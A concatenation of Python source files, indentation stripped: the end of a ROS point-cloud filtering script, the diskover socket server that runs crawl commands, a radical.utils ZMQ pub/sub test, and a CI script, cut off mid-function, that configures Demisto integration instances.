if len(points) == 0:
return False, False, False
t2 = time.time()
#print("length pre-processed points: {}".format(len(points)))
np_vox = np.ceil((np.max(points, axis=0) - np.min(points, axis=0)) / voxel_size)
non_empty_voxel_keys, inverse, nb_pts_per_voxel = np.unique(((points - np.min(points, axis=0)) // voxel_size).astype(int), axis=0, return_inverse=True, return_counts=True)
idx_pts_sorted = np.argsort(inverse)
voxel_grid = {}
grid_barycenter, grid_candidate_center = [], []
last_seen = int(0)
for idx, vox in enumerate(non_empty_voxel_keys):
voxel_grid[tuple(vox)] = points[idx_pts_sorted[int(last_seen):int(last_seen + nb_pts_per_voxel[idx])]]
grid_barycenter.append(np.mean(voxel_grid[tuple(vox)], axis=0))
grid_candidate_center.append(voxel_grid[tuple(vox)][np.linalg.norm(voxel_grid[tuple(vox)] - np.mean(voxel_grid[tuple(vox)], axis=0), axis=1).argmin()])
last_seen += nb_pts_per_voxel[idx]
points = np.array(list(filter(lambda x: x[0] != 0, list(grid_candidate_center))))
t3 = time.time()
points_layer = []
for i, p in enumerate(points):
# When the pointcloud has z-foward axis, the xyz-coordinate order should be [p[0], p[2], -p[1]].
#if -p[1] > 0.1 and -p[1] < 0.6:
# points_layer.append([p[0], p[2], -p[1]])
# When the pointcloud has x-foward axis, the xyz-coordinate order should be [-p[1], p[0], p[2]].
if p[2] > 0.1 and p[2] < 0.6:
points_layer.append([-p[1], p[0], p[2]])
samples = np.array(points_layer)
if plot:
print("time took")
print(t2-t1)
print(t3-t2)
print(time.time() - t3)
plt.scatter(points[:,0], points[:,2], label='voxel grid filtering')
if len(samples):
plt.scatter(samples[:,0], samples[:,1], label='height filtering')
plt.xlim(-1.5,1.5)
plt.ylim(0,6)
plt.legend()
plt.title("Top view points after filter processing")
plt.xlabel("x (m)")
plt.ylabel("y (m)")
plt.pause(0.05)
plt.cla()
plt.clf()
color_image = color_image_raw
# Show images
#cv2.namedWindow('RealSense', cv2.WINDOW_AUTOSIZE)
#cv2.imshow('RealSense', color_image)
#cv2.imshow('RealSense_depth', depth_image)
if cv2.waitKey(1) == 27: #esc
cv2.destroyAllWindows()
rospy.signal_shutdown("esc")
if args.csv:
f.close()
sys.exit(1)
if ros:
pub_pc2 = pc2.create_cloud(header, fields, samples)
pub_pc2.header.stamp = rospy.Time.now()
pub.publish(pub_pc2)
return samples, robot_state, sim_time
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--control', action='store_true')
parser.add_argument('--plot', action='store_true')
parser.add_argument('--csv', action='store_true')
args = parser.parse_args()
if args.csv:
CSV_NAME = "office_01"
f= open(CSV_NAME+'.csv','w')
wr = csv.writer(f)
wr.writerow(["time", \
"linear_x", "angular_z", \
"deadends"])
pc2obs_init()
while True:
samples = pc2obs(voxel_size = 0.3, plot=args.plot)
# print(samples)
f.close()
exit()
|
diskover_socket_server.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""diskover - Elasticsearch file system crawler
diskover is a file system crawler that index's
your file metadata into Elasticsearch.
See README.md or https://github.com/shirosaidev/diskover
for more information.
Copyright (C) Chris Park 2017-2018
diskover is released under the Apache 2.0 license. See
LICENSE for the full license text.
"""
from diskover import q_crawl, adaptive_batch, config, get_time
from diskover_bot_module import scrape_tree_meta
import socket
import subprocess
try:
import queue as Queue
except ImportError:
import Queue
import threading
import uuid
import json
import time
import sys
import pickle
import struct
# dict to hold socket tasks
socket_tasks = {}
# list of socket client
clientlist = []
def socket_thread_handler(threadnum, q, cliargs, logger):
"""This is the socket thread handler function.
It runs the command msg sent from client.
"""
BUFF = 1024
while True:
try:
c = q.get()
clientsock, addr = c
logger.debug(clientsock)
logger.debug(addr)
data = clientsock.recv(BUFF)
data = data.decode('utf-8')
logger.debug('received data: %s' % data)
if not data:
q.task_done()
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
continue
# check if ping msg
if data == 'ping':
logger.info("[thread-%s]: Got ping from %s" % (threadnum, str(addr)))
# send pong reply
message = b'pong'
clientsock.send(message)
logger.debug('sending data: %s' % message)
else:
# strip away any headers sent by curl
data = data.split('\r\n')[-1]
logger.info("[thread-%s]: Got command from %s" % (threadnum, str(addr)))
# load json and store in dict
command_dict = json.loads(data)
logger.debug(command_dict)
# run command from json data
run_command(threadnum, command_dict, clientsock, cliargs, logger)
q.task_done()
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
except (ValueError, TypeError) as e:
q.task_done()
logger.error("[thread-%s]: Invalid JSON from %s: (%s)" % (threadnum, str(addr), e))
message = b'{"msg": "error", "error": ' + e + b'}\n'
clientsock.send(message)
logger.debug(message)
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
pass
except socket.error as e:
q.task_done()
logger.error("[thread-%s]: Socket error (%s)" % (threadnum, e))
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
pass
def recvall(sock, count):
buf = b''
while count:
newbuf = sock.recv(count)
if not newbuf: return None
buf += newbuf
count -= len(newbuf)
return buf
def recv_one_message(sock):
lengthbuf = recvall(sock, 4)
if not lengthbuf:
return None
length, = struct.unpack('!I', lengthbuf)
return recvall(sock, length)
def socket_thread_handler_twc(threadnum, q, q_kill, lock, rootdir, num_sep, level,
batchsize, cliargs, logger, reindex_dict):
"""This is the socket thread handler tree walk client function.
Stream of directory listings (pickle) from diskover treewalk
client connections are enqueued to redis rq queue.
"""
while True:
try:
c = q.get()
clientsock, addr = c
logger.debug(clientsock)
logger.debug(addr)
while True:
data = recv_one_message(clientsock)
#logger.debug(data)
if not data:
break
if data == b'SIGKILL' or data == 'SIGKILL':
q_kill.put(b'SIGKILL')
break
data_decoded = pickle.loads(data)
logger.debug(data_decoded)
# enqueue to redis
batch = []
for root, dirs, files in data_decoded:
if len(dirs) == 0 and len(files) == 0 and not cliargs['indexemptydirs']:
continue
batch.append((root, files))
batch_len = len(batch)
if batch_len >= batchsize:
q_crawl.enqueue(scrape_tree_meta, args=(batch, cliargs, reindex_dict,))
del batch[:]
if cliargs['adaptivebatch']:
batchsize = adaptive_batch(q_crawl, cliargs, batchsize)
if len(batch) > 0:
# add any remaining in batch to queue
q_crawl.enqueue(scrape_tree_meta, args=(batch, cliargs, reindex_dict,))
del batch[:]
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
q.task_done()
except socket.error as e:
logger.error("[thread-%s]: Socket error (%s)" % (threadnum, e))
def start_socket_server(cliargs, logger):
"""This is the start socket server function.
It opens a socket and waits for remote commands.
"""
global clientlist
# set thread/connection limit
max_connections = config['listener_maxconnections']
# Queue for socket threads
q = Queue.Queue(maxsize=max_connections)
try:
# create TCP socket object
serversock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = config['listener_host'] # default is localhost
port = config['listener_port'] # default is 9999
# bind to port
serversock.bind((host, port))
# start listener
serversock.listen(max_connections)
# set up the threads and start them
for i in range(max_connections):
# create thread
t = threading.Thread(target=socket_thread_handler, args=(i, q, cliargs, logger,))
t.daemon = True
t.start()
while True:
logger.info("Waiting for connection, listening on %s port %s TCP (ctrl-c to shutdown)"
% (str(host), str(port)))
# establish connection
clientsock, addr = serversock.accept()
logger.debug(clientsock)
logger.debug(addr)
logger.info("Got a connection from %s" % str(addr))
# add client to list
client = [clientsock, addr]
clientlist.append(client)
# add task to Queue
q.put(client)
except socket.error as e:
serversock.close()
logger.error("Error opening socket (%s)" % e)
sys.exit(1)
except KeyboardInterrupt:
print('\nCtrl-c keyboard interrupt received, shutting down...')
q.join()
serversock.close()
sys.exit(0)
def start_socket_server_twc(rootdir_path, num_sep, level, batchsize, cliargs, logger, reindex_dict):
"""This is the start socket server function.
It opens a socket and waits for remote commands.
"""
global clientlist
# set thread/connection limit
max_connections = config['listener_maxconnections']
# Queue for socket threads
q = Queue.Queue(maxsize=max_connections)
q_kill = Queue.Queue()
lock = threading.Lock()
try:
# create TCP socket object
serversock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = config['listener_host'] # default is localhost
port = config['listener_twcport'] # default is 9998
# bind to port
serversock.bind((host, port))
# start listener
serversock.listen(max_connections)
# set up the threads and start them
for i in range(max_connections):
# create thread
t = threading.Thread(target=socket_thread_handler_twc, args=(i, q, q_kill, lock, rootdir_path, num_sep,
level, batchsize, cliargs, logger, reindex_dict,))
t.daemon = True
t.start()
while True:
if q_kill.qsize() > 0:
logger.info("Received signal to shutdown socket server")
q.join()
serversock.close()
return starttime
logger.info("Waiting for connection, listening on %s port %s TCP (ctrl-c to shutdown)"
% (str(host), str(port)))
# establish connection
clientsock, addr = serversock.accept()
logger.debug(clientsock)
logger.debug(addr)
logger.info("Got a connection from %s" % str(addr))
# add client to list
client = [clientsock, addr]
clientlist.append(client)
# set start time to first connection
if len(clientlist) == 1:
starttime = time.time()
# add task to Queue
q.put(client)
except socket.error as e:
serversock.close()
logger.error("Error opening socket (%s)" % e)
sys.exit(1)
except KeyboardInterrupt:
print('\nCtrl-c keyboard interrupt received, shutting down...')
serversock.close()
sys.exit(0)
def run_command(threadnum, command_dict, clientsock, cliargs, logger):
"""This is the run command function.
It runs commands from the listener socket
using values in command_dict.
"""
global socket_tasks
global clientlist
# try to get index name from command or use from diskover config file
try:
index = str(command_dict['index'])
except KeyError:
index = str(config['index'])
pass
# try to get worker batch size from command or use default
try:
batchsize = str(command_dict['batchsize'])
except KeyError:
batchsize = str(cliargs['batchsize'])
pass
# try to get adaptive batch option from command or use default
try:
adaptivebatch = str(command_dict['adaptivebatch'])
except KeyError:
adaptivebatch = str(cliargs['adaptivebatch'])
pass
try:
action = command_dict['action']
pythonpath = config['python_path']
diskoverpath = config['diskover_path']
# set up command for different action
if action == 'crawl':
path = command_dict['path']
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '-q']
elif action == 'finddupes':
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '--finddupes', '-q']
elif action == 'hotdirs':
index2 = str(command_dict['index2'])
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '--hotdirs', index2, '-q']
elif action == 'reindex':
try:
recursive = command_dict['recursive']
except KeyError:
recursive = 'false'
pass
path = command_dict['path']
if recursive == 'true':
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '-R', '-q']
else:
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '-r', '-q']
elif action == 'updatedirsizes':
try:
recursive = command_dict['recursive']
except KeyError:
recursive = 'false'
pass
if recursive == 'true':
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '--dircalcsonly', '-q']
else:
path = command_dict['path']
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '--dircalcsonly', '--maxdcdepth', '0', '-q']
elif action == 'kill':
taskid = command_dict['taskid']
logger.info("[thread-%s]: Kill task message received! (taskid:%s)",
threadnum, taskid)
# do something here to kill task (future)
message = b'{"msg": "taskkilled"}\n'
clientsock.send(message)
return
else:
logger.warning("Unknown action")
message = b'{"error": "unknown action"}\n'
clientsock.send(message)
return
# add adaptive batch
if (adaptivebatch == "True" or adaptivebatch == "true"):
cmd.append('-a')
# run command using subprocess
starttime = time.time()
taskid = str(uuid.uuid4()).encode('utf-8')
# start process
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# add process to socket_tasks dict
socket_tasks[taskid] = process
message = b'{"msg": "taskstart", "taskid": "' + taskid + b'"}\n'
clientsock.send(message)
logger.info("[thread-%s]: Running command (taskid:%s)",
threadnum, taskid.decode('utf-8'))
logger.info(cmd)
output, error = process.communicate()
# send exit msg to client
exitcode = str(process.returncode).encode('utf-8')
logger.debug('Command output:')
logger.debug(output.decode('utf-8'))
logger.debug('Command error:')
logger.debug(error.decode('utf-8'))
elapsedtime = str(get_time(time.time() - starttime)).encode('utf-8')
logger.info("Finished command (taskid:%s), exit code: %s, elapsed time: %s"
% (taskid.decode('utf-8'), exitcode.decode('utf-8'), elapsedtime.decode('utf-8')))
message = b'{"msg": "taskfinish", "taskid": "%s", "exitcode": %s, "elapsedtime": "%s"}\n' \
% (taskid, exitcode, elapsedtime)
clientsock.send(message)
except ValueError:
logger.warning("Value error")
message = b'{"error": "value error"}\n'
clientsock.send(message)
pass
except socket.error as e:
logger.error("[thread-%s]: Socket error (%s)" % (threadnum, e))
pass
|
test_zmq_pubsub.py
|
#!/usr/bin/env python
__author__ = 'Radical.Utils Development Team'
__copyright__ = 'Copyright 2019, RADICAL@Rutgers'
__license__ = 'MIT'
import time
import threading as mt
import radical.utils as ru
# ------------------------------------------------------------------------------
#
def test_zmq_pubsub():
'''
create a bridge, 2 producers (A, B) and 2 consumers (C, D). Send with the
following rates for 10 seconds:
A: 10/s
B: 20/s
Ensure that
- the ratios of sent / received messages reflects the rates
- the local order of messages is preserved
- messages are received exactly once (no messages get lost / duplicated)
'''
c_a = 200
c_b = 400
cfg = ru.Config(cfg={'uid' : 'test_pubsub',
'channel' : 'test',
'kind' : 'pubsub',
'log_level': 'error',
'path' : '/tmp/',
'sid' : 'test_sid',
'bulk_size': 0,
'stall_hwm': 1,
})
b = ru.zmq.PubSub(cfg)
b.start()
assert(b.addr_in != b.addr_out)
assert(b.addr_in == b.addr_pub)
assert(b.addr_out == b.addr_sub)
data = dict()
for i in 'ABCD':
data[i] = dict()
for j in 'AB':
data[i][j] = 0
def cb(uid, topic, msg):
if msg['idx'] is None:
return False
data[uid][msg['src']] += 1
cb_C = lambda t,m: cb('C', t, m)
cb_D = lambda t,m: cb('D', t, m)
ru.zmq.Subscriber(channel=cfg['channel'], url=str(b.addr_sub),
topic='topic', cb=cb_C)
ru.zmq.Subscriber(channel=cfg['channel'], url=str(b.addr_sub),
topic='topic', cb=cb_D)
time.sleep(0.1)
# --------------------------------------------------------------------------
def work_pub(uid, n, delay):
pub = ru.zmq.Publisher(channel=cfg['channel'], url=str(b.addr_pub))
idx = 0
while idx < n:
time.sleep(delay)
pub.put('topic', {'src': uid,
'idx': idx})
idx += 1
data[uid][uid] += 1
# send EOF
pub.put('topic', {'src': uid,
'idx': None})
# --------------------------------------------------------------------------
t_a = mt.Thread(target=work_pub, args=['A', c_a, 0.005])
t_b = mt.Thread(target=work_pub, args=['B', c_b, 0.005])
t_a.start()
t_b.start()
t_a.join()
t_b.join()
b.stop()
time.sleep(0.1)
assert(data['A']['A'] == c_a)
assert(data['B']['B'] == c_b)
assert(data['C']['A'] + data['C']['B'] +
data['D']['A'] + data['D']['B'] == 2 * (c_a + c_b))
# ------------------------------------------------------------------------------
# run tests if called directly
if __name__ == '__main__':
test_zmq_pubsub()
# ------------------------------------------------------------------------------
|
configure_and_test_integration_instances.py
|
from __future__ import print_function
import argparse
import ast
import json
import os
import subprocess
import sys
import uuid
import zipfile
from datetime import datetime
from distutils.version import LooseVersion
from enum import IntEnum
from pprint import pformat
from threading import Thread
from time import sleep
from typing import List, Tuple, Union
from urllib.parse import quote_plus
import demisto_client
from demisto_sdk.commands.common.constants import FileType
from demisto_sdk.commands.common.tools import run_threads_list, run_command, get_yaml, \
str2bool, format_version, find_type
from demisto_sdk.commands.test_content.constants import SSH_USER
from demisto_sdk.commands.test_content.mock_server import MITMProxy, run_with_mock, RESULT
from demisto_sdk.commands.test_content.tools import update_server_configuration, is_redhat_instance
from demisto_sdk.commands.test_content.TestContentClasses import BuildContext
from demisto_sdk.commands.validate.validate_manager import ValidateManager
from ruamel import yaml
from Tests.Marketplace.search_and_install_packs import search_and_install_packs_and_their_dependencies, \
upload_zipped_packs, install_all_content_packs_for_nightly
from Tests.scripts.utils.log_util import install_logging
from Tests.scripts.utils import logging_wrapper as logging
from Tests.test_content import get_server_numeric_version
from Tests.test_integration import __get_integration_config, __test_integration_instance, disable_all_integrations
from Tests.tools import run_with_proxy_configured
from Tests.update_content_data import update_content
MARKET_PLACE_MACHINES = ('master',)
SKIPPED_PACKS = ['NonSupported', 'ApiModules']
NO_PROXY = ','.join([
'oproxy.demisto.ninja',
'oproxy-dev.demisto.ninja',
])
NO_PROXY_CONFIG = {'python.pass.extra.keys': f'--env##no_proxy={NO_PROXY}'} # noqa: E501
DOCKER_HARDENING_CONFIGURATION = {
'docker.cpu.limit': '1.0',
'docker.run.internal.asuser': 'true',
'limit.docker.cpu': 'true',
'python.pass.extra.keys': f'--memory=1g##--memory-swap=-1##--pids-limit=256##--ulimit=nofile=1024:8192##--env##no_proxy={NO_PROXY}', # noqa: E501
'powershell.pass.extra.keys': f'--env##no_proxy={NO_PROXY}',
}
DOCKER_HARDENING_CONFIGURATION_FOR_PODMAN = {
'docker.run.internal.asuser': 'true'
}
MARKET_PLACE_CONFIGURATION = {
'content.pack.verify': 'false',
'marketplace.initial.sync.delay': '0',
'content.pack.ignore.missing.warnings.contentpack': 'true'
}
AVOID_DOCKER_IMAGE_VALIDATION = {
'content.validate.docker.images': 'false'
}
ID_SET_PATH = './artifacts/id_set.json'
class Running(IntEnum):
CI_RUN = 0
WITH_OTHER_SERVER = 1
WITH_LOCAL_SERVER = 2
class Server:
def __init__(self, internal_ip, port, user_name, password):
self.__ssh_client = None
self.__client = None
self.internal_ip = internal_ip
self.ssh_tunnel_port = port
self.user_name = user_name
self.password = password
def __str__(self):
return self.internal_ip
@property
def client(self):
if self.__client is None:
self.__client = self.reconnect_client()
return self.__client
def reconnect_client(self):
self.__client = demisto_client.configure(f'https://localhost:{self.ssh_tunnel_port}',
verify_ssl=False,
username=self.user_name,
password=self.password)
return self.__client
def add_server_configuration(self, config_dict, error_msg, restart=False):
update_server_configuration(self.client, config_dict, error_msg)
if restart:
self.exec_command('sudo systemctl restart demisto')
def exec_command(self, command):
subprocess.check_output(f'ssh {SSH_USER}@{self.internal_ip} {command}'.split(),
stderr=subprocess.STDOUT)
def get_id_set(id_set_path) -> Union[dict, None]:
"""
Used to collect the ID set so it can be passed to the Build class on init.
:return: ID set as a dict if it exists.
"""
if os.path.isfile(id_set_path):
return get_json_file(id_set_path)
return None
class Build:
# START CHANGE ON LOCAL RUN #
content_path = f'{os.getenv("HOME")}/project' if os.getenv('CIRCLECI') else os.getenv('CI_PROJECT_DIR')
test_pack_target = f'{os.getenv("HOME")}/project/Tests' if os.getenv('CIRCLECI') else f'{os.getenv("CI_PROJECT_DIR")}/Tests' # noqa
key_file_path = 'Use in case of running with non local server'
run_environment = Running.CI_RUN
env_results_path = f'{os.getenv("ARTIFACTS_FOLDER")}/env_results.json'
DEFAULT_SERVER_VERSION = '99.99.98'
# END CHANGE ON LOCAL RUN #
def __init__(self, options):
self._proxy = None
self.git_sha1 = options.git_sha1
self.branch_name = options.branch
self.ci_build_number = options.build_number
self.is_nightly = options.is_nightly
self.ami_env = options.ami_env
self.server_to_port_mapping, self.server_numeric_version = self.get_servers(options.ami_env)
self.secret_conf = get_json_file(options.secret)
self.username = options.user if options.user else self.secret_conf.get('username')
self.password = options.password if options.password else self.secret_conf.get('userPassword')
self.servers = [Server(internal_ip,
port,
self.username,
self.password) for internal_ip, port in self.server_to_port_mapping.items()]
self.is_private = options.is_private
conf = get_json_file(options.conf)
self.tests = conf['tests']
self.skipped_integrations_conf = conf['skipped_integrations']
self.unmockable_integrations = conf['unmockable_integrations']
id_set_path = options.id_set_path if options.id_set_path else ID_SET_PATH
self.id_set = get_id_set(id_set_path)
self.test_pack_path = options.test_pack_path if options.test_pack_path else None
self.tests_to_run = self.fetch_tests_list(options.tests_to_run)
self.content_root = options.content_root
self.pack_ids_to_install = self.fetch_pack_ids_to_install(options.pack_ids_to_install)
self.service_account = options.service_account
@property
def proxy(self) -> MITMProxy:
"""
A property method that should create and return a single proxy instance through out the build
Returns:
The single proxy instance that should be used in this build.
"""
if not self._proxy:
self._proxy = MITMProxy(self.servers[0].internal_ip,
logging_module=logging,
build_number=self.ci_build_number,
branch_name=self.branch_name)
return self._proxy
@staticmethod
def fetch_tests_list(tests_to_run_path: str):
"""
Fetches the test list from the filter.
:param tests_to_run_path: Path to location of test filter.
:return: List of tests if there are any, otherwise empty list.
"""
tests_to_run = []
with open(tests_to_run_path, "r") as filter_file:
tests_from_file = filter_file.readlines()
for test_from_file in tests_from_file:
test_clean = test_from_file.rstrip()
tests_to_run.append(test_clean)
return tests_to_run
@staticmethod
def fetch_pack_ids_to_install(packs_to_install_path: str):
"""
Fetches the test list from the filter.
:param packs_to_install_path: Path to location of pack IDs to install file.
:return: List of Pack IDs if there are any, otherwise empty list.
"""
tests_to_run = []
with open(packs_to_install_path, "r") as filter_file:
tests_from_file = filter_file.readlines()
for test_from_file in tests_from_file:
test_clean = test_from_file.rstrip()
tests_to_run.append(test_clean)
return tests_to_run
@staticmethod
def get_servers(ami_env):
env_conf = get_env_conf()
server_to_port_mapping = map_server_to_port(env_conf, ami_env)
if Build.run_environment == Running.CI_RUN:
server_numeric_version = get_server_numeric_version(ami_env)
else:
server_numeric_version = Build.DEFAULT_SERVER_VERSION
return server_to_port_mapping, server_numeric_version
def options_handler():
parser = argparse.ArgumentParser(description='Utility for instantiating and testing integration instances')
parser.add_argument('-u', '--user', help='The username for the login', required=True)
parser.add_argument('-p', '--password', help='The password for the login', required=True)
parser.add_argument('--ami_env', help='The AMI environment for the current run. Options are '
'"Server Master", "Server 6.0". '
'The server url is determined by the AMI environment.')
parser.add_argument('-g', '--git_sha1', help='commit sha1 to compare changes with')
parser.add_argument('-c', '--conf', help='Path to conf file', required=True)
parser.add_argument('-s', '--secret', help='Path to secret conf file')
parser.add_argument('-n', '--is-nightly', type=str2bool, help='Is nightly build')
parser.add_argument('-pr', '--is_private', type=str2bool, help='Is private build')
parser.add_argument('--branch', help='GitHub branch name', required=True)
parser.add_argument('--build-number', help='CI job number where the instances were created', required=True)
parser.add_argument('--test_pack_path', help='Path to where the test pack will be saved.',
default='/home/runner/work/content-private/content-private/content/artifacts/packs')
parser.add_argument('--content_root', help='Path to the content root.',
default='/home/runner/work/content-private/content-private/content')
parser.add_argument('--id_set_path', help='Path to the ID set.')
parser.add_argument('-l', '--tests_to_run', help='Path to the Test Filter.',
default='./artifacts/filter_file.txt')
parser.add_argument('-pl', '--pack_ids_to_install', help='Path to the packs to install file.',
default='./artifacts/content_packs_to_install.txt')
# disable-secrets-detection-start
parser.add_argument('-sa', '--service_account',
help=("Path to gcloud service account, is for circleCI usage. "
"For local development use your personal account and "
"authenticate using Google Cloud SDK by running: "
"`gcloud auth application-default login` and leave this parameter blank. "
"For more information go to: "
"https://googleapis.dev/python/google-api-core/latest/auth.html"),
required=False)
# disable-secrets-detection-end
options = parser.parse_args()
return options
def check_test_version_compatible_with_server(test, server_version):
"""
Checks if a given test is compatible wis the given server version.
Arguments:
test: (dict)
Test playbook object from content conf.json. May contain the following fields: "playbookID",
"integrations", "instance_names", "timeout", "nightly", "fromversion", "toversion.
server_version: (int)
The server numerical version.
Returns:
(bool) True if test is compatible with server version or False otherwise.
"""
test_from_version = format_version(test.get('fromversion', '0.0.0'))
test_to_version = format_version(test.get('toversion', '99.99.99'))
server_version = format_version(server_version)
if not LooseVersion(test_from_version) <= LooseVersion(server_version) <= LooseVersion(test_to_version):
playbook_id = test.get('playbookID')
logging.debug(
f'Test Playbook: {playbook_id} was ignored in the content installation test due to version mismatch '
f'(test versions: {test_from_version}-{test_to_version}, server version: {server_version})')
return False
return True
def filter_tests_with_incompatible_version(tests, server_version):
"""
Filter all tests with incompatible version to the given server.
Arguments:
tests: (list)
List of test objects.
server_version: (int)
The server numerical version.
Returns:
(lst): List of filtered tests (compatible version)
"""
filtered_tests = [test for test in tests if
check_test_version_compatible_with_server(test, server_version)]
return filtered_tests
def configure_integration_instance(integration, client, placeholders_map):
"""
Configure an instance for an integration
Arguments:
integration: (dict)
Integration object whose params key-values are set
client: (demisto_client)
The client to connect to
placeholders_map: (dict)
Dict that holds the real values to be replaced for each placeholder.
Returns:
(dict): Configured integration instance
"""
integration_name = integration.get('name')
logging.info(f'Configuring instance for integration "{integration_name}"')
integration_instance_name = integration.get('instance_name', '')
integration_params = change_placeholders_to_values(placeholders_map, integration.get('params'))
is_byoi = integration.get('byoi', True)
validate_test = integration.get('validate_test', True)
integration_configuration = __get_integration_config(client, integration_name)
if not integration_configuration:
return None
# In the integration configuration in content-test-conf conf.json, the test_validate flag was set to false
if not validate_test:
logging.debug(f'Skipping configuration for integration: {integration_name} (it has test_validate set to false)')
return None
module_instance = set_integration_instance_parameters(integration_configuration, integration_params,
integration_instance_name, is_byoi, client)
return module_instance
def filepath_to_integration_name(integration_file_path):
"""Load an integration file and return the integration name.
Args:
integration_file_path (str): The path to an integration yml file.
Returns:
(str): The name of the integration.
"""
integration_yaml = get_yaml(integration_file_path)
integration_name = integration_yaml.get('name')
return integration_name
def get_integration_names_from_files(integration_files_list):
integration_names_list = [filepath_to_integration_name(path) for path in integration_files_list]
return [name for name in integration_names_list if name] # remove empty values
def get_new_and_modified_integration_files(branch_name):
"""Return 2 lists - list of new integrations and list of modified integrations since the first commit of the branch.
Args:
branch_name: The branch name against which we will run the 'git diff' command.
Returns:
(tuple): Returns a tuple of two lists, the file paths of the new integrations and modified integrations.
"""
# get changed yaml files (filter only added and modified files)
file_validator = ValidateManager(skip_dependencies=True)
file_validator.branch_name = branch_name
modified_files, added_files, _, _, _ = file_validator.get_changed_files_from_git()
new_integration_files = [
file_path for file_path in added_files if
find_type(file_path) in [FileType.INTEGRATION, FileType.BETA_INTEGRATION]
]
modified_integration_files = [
file_path for file_path in modified_files if
isinstance(file_path, str) and find_type(file_path) in [FileType.INTEGRATION, FileType.BETA_INTEGRATION]
]
return new_integration_files, modified_integration_files
def is_content_update_in_progress(client):
"""Make request to check if content is updating.
Args:
client (demisto_client): The configured client to use.
Returns:
(str): Returns the request response data which is 'true' if updating and 'false' if not.
"""
host = client.api_client.configuration.host
logging.debug(f'Making "Get" request to server - "{host}" to check if content is installing.')
# make request to check if content is updating
response_data, status_code, _ = demisto_client.generic_request_func(self=client, path='/content/updating',
method='GET', accept='application/json')
if status_code >= 300 or status_code < 200:
result_object = ast.literal_eval(response_data)
message = result_object.get('message', '')
logging.error(f"Failed to check if content is installing - with status code {status_code}\n{message}")
return 'request unsuccessful'
return response_data
def get_content_version_details(client, ami_name):
"""Make request for details about the content installed on the demisto instance.
Args:
client (demisto_client): The configured client to use.
ami_name (string): the role name of the machine
Returns:
(tuple): The release version and asset ID of the content installed on the demisto instance.
"""
host = client.api_client.configuration.host
logging.info(f'Making "POST" request to server - "{host}" to check installed content.')
# make request to installed content details
uri = '/content/installedlegacy' if ami_name in MARKET_PLACE_MACHINES else '/content/installed'
response_data, status_code, _ = demisto_client.generic_request_func(self=client, path=uri,
method='POST')
try:
result_object = ast.literal_eval(response_data)
logging.debug(f'Response was {response_data}')
except ValueError:
logging.exception('failed to parse response from demisto.')
return '', 0
if status_code >= 300 or status_code < 200:
message = result_object.get('message', '')
logging.error(f'Failed to check if installed content details - with status code {status_code}\n{message}')
return result_object.get('release', ''), result_object.get('assetId', 0)
def change_placeholders_to_values(placeholders_map, config_item):
"""Replaces placeholders in the object to their real values
Args:
placeholders_map: (dict)
Dict that holds the real values to be replaced for each placeholder.
config_item: (json object)
Integration configuration object.
Returns:
dict. json object with the real configuration.
"""
item_as_string = json.dumps(config_item)
for key, value in placeholders_map.items():
item_as_string = item_as_string.replace(key, str(value))
return json.loads(item_as_string)
def set_integration_params(build,
integrations,
secret_params,
instance_names,
placeholders_map,
logging_module=logging):
"""
For each integration object, fill in the parameter values needed to configure an instance from
the secret_params taken from our secret configuration file. Because there may be a number of
configurations for a single integration (if there are values provided in our secret conf for
multiple different instances of the same integration) then selects the parameter values for the
configuration of the instance whose instance is in 'instance_names' (will take the last one listed
in 'secret_params'). Note that this function does not explicitly return the modified 'integrations'
object but rather it modifies the 'integrations' object since it is passed by reference and not by
value, so the 'integrations' object that was passed to this function will have been changed once
this function has completed execution and gone out of scope.
Arguments:
build: Build object
integrations: (list of dicts)
List of integration objects whose 'params' attribute will be populated in this function.
secret_params: (list of dicts)
List of secret configuration values for all of our integrations (as well as specific
instances of said integrations).
instance_names: (list)
The names of particular instances of an integration to use the secret_params of as the
configuration values.
placeholders_map: (dict)
Dict that holds the real values to be replaced for each placeholder.
logging_module (Union[ParallelLoggingManager,logging]): The logging module to use
Returns:
(bool): True if integrations params were filled with secret configuration values, otherwise false
"""
for integration in integrations:
integration_params = [change_placeholders_to_values(placeholders_map, item) for item
in secret_params if item['name'] == integration['name']]
if integration_params:
matched_integration_params = integration_params[0]
# if there are more than one integration params, it means that there are configuration
# values in our secret conf for multiple instances of the given integration and now we
# need to match the configuration values to the proper instance as specified in the
# 'instance_names' list argument
if len(integration_params) != 1:
found_matching_instance = False
for item in integration_params:
if item.get('instance_name', 'Not Found') in instance_names:
matched_integration_params = item
found_matching_instance = True
if not found_matching_instance:
optional_instance_names = [optional_integration.get('instance_name', 'None')
for optional_integration in integration_params]
failed_match_instance_msg = 'There are {} instances of {}, please select one of them by using' \
' the instance_name argument in conf.json. The options are:\n{}'
logging_module.error(failed_match_instance_msg.format(len(integration_params),
integration['name'],
'\n'.join(optional_instance_names)))
return False
integration['params'] = matched_integration_params.get('params', {})
integration['byoi'] = matched_integration_params.get('byoi', True)
integration['instance_name'] = matched_integration_params.get('instance_name', integration['name'])
integration['validate_test'] = matched_integration_params.get('validate_test', True)
if integration['name'] not in build.unmockable_integrations:
integration['params'].update({'proxy': True})
logging.debug(
